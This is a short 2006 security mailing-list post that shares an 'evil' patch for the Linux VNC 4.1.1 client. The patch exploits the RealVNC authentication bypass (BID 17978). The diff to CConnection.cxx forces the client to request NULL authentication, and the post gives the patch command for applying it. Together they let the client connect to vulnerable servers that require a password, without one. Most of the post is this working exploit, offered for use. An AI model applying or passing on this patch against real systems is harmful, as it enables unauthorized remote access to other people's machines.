Linux VNC evil client patch - BID 17978 Jun 23 2006 03:33PM
embyte madlab it
Hi all,

I have done a patch to current Linux VNC client (ver. 4.1.1), which permit to authenticate to a bugged server with a NULL session, although password authentication is required

(RealVNC Remote Authentication Bypass Vulnerability, BID 17978).

Here is the patch for file CConnection.cxx

$ cat vnc4-4.1.1+X4.3.0-NULL-Auth.patch


< // Inform the server of our decision

< if (secType != secTypeInvalid) {


> // Send to server NULL Auth [0x01]

> if (secType=0x01) {

Apply with

$ patch < vnc4-4.1.1+X4.3.0-NULL-Auth.patch

File to patch: vnc4-4.1.1+X4.3.0.orig/common/rfb/CConnection.cxx

patching file vnc4-4.1.1+X4.3.0.orig/common/rfb/CConnection.cxx

The original tarball is named vnc4_4.1.1+X4.3.0.orig.tar.gz:


Have a nice day


[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus